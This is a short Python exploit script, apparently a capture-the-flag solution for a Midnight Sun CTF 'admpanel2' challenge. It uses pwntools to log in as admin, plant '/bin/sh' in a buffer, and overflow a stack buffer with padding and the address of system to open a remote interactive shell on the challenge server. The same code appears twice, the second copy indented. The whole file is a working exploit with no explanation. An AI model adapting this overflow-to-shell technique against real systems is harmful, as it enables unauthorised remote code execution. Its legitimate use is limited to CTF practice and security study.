zommiommy/x.py

## x.py
from pwn import *

s = remote("admpanel2-01.play.midnightsunctf.se", 31337)

system = 0x000000000401598
username_addr = 0x000000000040159B

s.sendline("1")
s.sendline("admin")
s.sendline("password")
s.sendline("1")
s.sendline("/bin/sh" + " " * 1024 )
s.sendline("2")
s.sendline("A" * cyclic_find("raac") + p64(system) + p64(username_addr))
s.interactive()
	from pwn import *

	s = remote("admpanel2-01.play.midnightsunctf.se", 31337)

	system = 0x000000000401598
	username_addr = 0x000000000040159B

	s.sendline("1")
	s.sendline("admin")
	s.sendline("password")
	s.sendline("1")
	s.sendline("/bin/sh" + " " * 1024 )
	s.sendline("2")
	s.sendline("A" * cyclic_find("raac") + p64(system) + p64(username_addr))
	s.interactive()